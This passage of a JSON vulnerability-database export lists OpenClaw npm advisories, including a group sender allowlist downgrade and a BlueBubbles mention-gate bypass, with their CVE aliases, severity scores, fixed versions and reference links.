                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-jtxm-z4vv-cqg7"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v1bp-hw9a-yffz"
                        },
                        {
                            "vulnerability": "VCID-v91b-1nmx-ckcx"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wut7-y72y-9ucb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"
                }
            ],
            "aliases": [
                "CVE-2026-35626",
                "GHSA-rm59-992w-x2mv"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-5s6h-u8x6-myfk"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90072?format=api",
            "vulnerability_id": "VCID-6849-th74-yqd5",
            "summary": "OpenClaw: Google Chat and Zalouser group sender allowlist bypass via policy downgrade\n## Summary\n\nWhen only a route-level group allowlist was configured, sender policy resolution silently downgraded from `allowlist` to `open` instead of preserving the configured group policy.\n\n## Impact\n\nAny member of an allowlisted Google Chat space or Zalouser group could interact with the bot even when the operator intended sender-level restrictions.\n\n## Affected Component\n\n`extensions/googlechat/src/monitor-access.ts, extensions/zalouser/src/monitor.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `e64a881ae0` (`Channels: preserve routed group policy`).\n\nOpenClaw thanks @AntAISecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33578",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00011",
                            "scoring_system": "epss",
                            "scoring_elements": "0.01537",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00011",
                            "scoring_system": "epss",
                            "scoring_elements": "0.01544",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00013",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02193",
                            "published_at": "2026-06-07T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33578"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/e64a881ae0fb8af18e451163f4c2d611d60cc8e4",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:25Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/e64a881ae0fb8af18e451163f4c2d611d60cc8e4"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-63mg-xp9j-jfcm",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:25Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-63mg-xp9j-jfcm"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33578",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33578"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-sender-policy-allowlist-bypass-via-policy-downgrade-in-google-chat-and-zalouser-extensions",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:25Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-sender-policy-allowlist-bypass-via-policy-downgrade-in-google-chat-and-zalouser-extensions"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-63mg-xp9j-jfcm",
                    "reference_id": "GHSA-63mg-xp9j-jfcm",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-63mg-xp9j-jfcm"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "CVE-2026-33578",
                "GHSA-63mg-xp9j-jfcm"
            ],
            "risk_score": 4.4,
            "exploitability": "0.5",
            "weighted_severity": "8.8",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6849-th74-yqd5"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91053?format=api",
            "vulnerability_id": "VCID-6bxd-kbse-sudx",
            "summary": "OpenClaw: BlueBubbles Group Reactions Bypass requireMention and Still Enqueue Agent-Visible System Events\n## Summary\n\nBlueBubbles Group Reactions Bypass requireMention and Still Enqueue Agent-Visible System Events\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nBlueBubbles group reaction events previously bypassed `requireMention` and still enqueued agent-visible system events in groups that were supposed to stay mention-gated. Commit `f8c98630785288cc1f1d0893503ef3b653a3cede` subjects the reaction path to the same mention gate as normal group messages.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `f8c98630785288cc1f1d0893503ef3b653a3cede`.\n\n## Fix Commit(s)\n\n- `f8c98630785288cc1f1d0893503ef3b653a3cede`",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/f8c98630785288cc1f1d0893503ef3b653a3cede",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/f8c98630785288cc1f1d0893503ef3b653a3cede"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-mw7w-g3mg-xqm7",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
